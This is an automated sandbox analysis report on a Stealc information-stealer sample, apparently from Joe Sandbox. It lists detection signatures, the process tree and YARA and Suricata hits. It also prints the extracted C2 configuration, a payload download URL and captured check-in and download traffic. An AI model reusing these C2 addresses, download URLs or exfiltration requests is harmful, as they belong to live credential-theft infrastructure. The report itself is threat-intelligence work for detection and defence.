Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GK059kPZ5B.exe

Overview

General Information

Sample name:GK059kPZ5B.exe
renamed because original name is a hash value
Original sample name:9883fdabd29a18139bd1cadedf550f35.exe
Analysis ID:1542871
MD5:9883fdabd29a18139bd1cadedf550f35
SHA1:b05c71cb505793c12a728daeaf069b90ea289d6d
SHA256:2d982e9ce07d6b2d0359f388c0cc0e2ad3fc3bed3b44236ef9d442abcaf44f30
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • GK059kPZ5B.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\GK059kPZ5B.exe" MD5: 9883FDABD29A18139BD1CADEDF550F35)
    • A865.tmp.exe (PID: 3640 cmdline: "C:\Users\user\AppData\Local\Temp\A865.tmp.exe" MD5: 8107C38AF897D81AA4BFE8CE9CA8407C)
      • WerFault.exe (PID: 6572 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 1324 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0xea8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000002.00000002.3069360956.0000000000849000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x11f0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        Click to see the 5 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.A865.tmp.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
          2.2.A865.tmp.exe.22d0e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
            2.2.A865.tmp.exe.22d0e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              2.3.A865.tmp.exe.2320000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                2.3.A865.tmp.exe.2320000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  Click to see the 1 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-26T19:08:41.936068+020020442431Malware Command and Control Activity Detected192.168.2.54970762.204.41.17780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-26T19:08:32.658480+020028032742Potentially Bad Traffic192.168.2.549704172.67.179.207443TCP
                  2024-10-26T19:08:33.704551+020028032742Potentially Bad Traffic192.168.2.549705176.113.115.3780TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000002.00000003.2224459772.0000000002320000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
                  Multi AV Scanner detection for submitted file
                  Source: GK059kPZ5B.exeReversingLabs: Detection: 50%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: GK059kPZ5B.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,2_2_0040C820
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,2_2_00407240
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00409AC0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_00418EA0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,2_2_00409B60
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DCA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,2_2_022DCA87
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022D74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,2_2_022D74A7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022D9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_022D9D27
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,2_2_022E9107
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022D9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,2_2_022D9DC7

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeUnpacked PE file: 0.2.GK059kPZ5B.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeUnpacked PE file: 2.2.A865.tmp.exe.400000.1.unpack
                  Source: GK059kPZ5B.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00438A12 FindFirstFileExW,0_2_00438A12
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A88C79 FindFirstFileExW,0_2_00A88C79
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040E430
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_004138B0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00414570
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00414910
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0040ED20
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0040BE70
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040DE10
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_004016D0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040DA80
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00413EA0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040F6B0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_022DE697
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_022E3B17
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022E4B77
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_022DEF87
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_022E47D7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022DE077
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_022DDCE7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DF8F1 FindFirstFileA,2_2_022DF8F1
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_022DC0D7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022D1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022D1937
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_022E4107
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022DF917

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49707 -> 62.204.41.177:80
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: http://62.204.41.177/edd20096ecef326d.php
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 26 Oct 2024 17:08:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 26 Oct 2024 17:00:01 GMTETag: "62400-625642a987083"Accept-Ranges: bytesContent-Length: 402432Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4b fa 88 0b 0f 9b e6 58 0f 9b e6 58 0f 9b e6 58 b2 d4 70 58 0e 9b e6 58 11 c9 62 58 11 9b e6 58 11 c9 73 58 1b 9b e6 58 11 c9 65 58 64 9b e6 58 28 5d 9d 58 0a 9b e6 58 0f 9b e7 58 74 9b e6 58 11 c9 6c 58 0e 9b e6 58 11 c9 72 58 0e 9b e6 58 11 c9 77 58 0e 9b e6 58 52 69 63 68 0f 9b e6 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bd b3 2f 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a8 03 00 00 38 10 00 00 00 00 00 ea 16 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 26 00 00 04 00 00 5b 38 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc db 03 00 3c 00 00 00 00 f0 11 00 f0 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c a6 03 00 00 10 00 00 00 a8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e0 25 00 00 00 c0 03 00 00 26 00 00 00 ac 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 f9 0d 00 00 f0 03 00 00 4c 00 00 00 d2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 14 14 00 00 f0 11 00 00 06 02 00 00 1e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGHHost: 62.204.41.177Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 38 33 42 42 30 34 31 46 44 42 32 34 39 36 36 31 38 36 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 2d 2d 0d 0a Data Ascii: ------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="hwid"B683BB041FDB2496618675------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="build"default9_cap------DAFHIDGIJKJKECBGDBGH--
                  Source: Joe Sandbox ViewIP Address: 176.113.115.37 176.113.115.37
                  Source: Joe Sandbox ViewIP Address: 62.204.41.177 62.204.41.177
                  Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 176.113.115.37:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 172.67.179.207:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00402A14 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00402A14
                  Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                  Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.37
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                  Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGHHost: 62.204.41.177Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 38 33 42 42 30 34 31 46 44 42 32 34 39 36 36 31 38 36 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 2d 2d 0d 0a Data Ascii: ------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="hwid"B683BB041FDB2496618675------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="build"default9_cap------DAFHIDGIJKJKECBGDBGH--
                  Source: GK059kPZ5B.exe, GK059kPZ5B.exe, 00000000.00000003.4442572205.000000000090F000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555505002.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
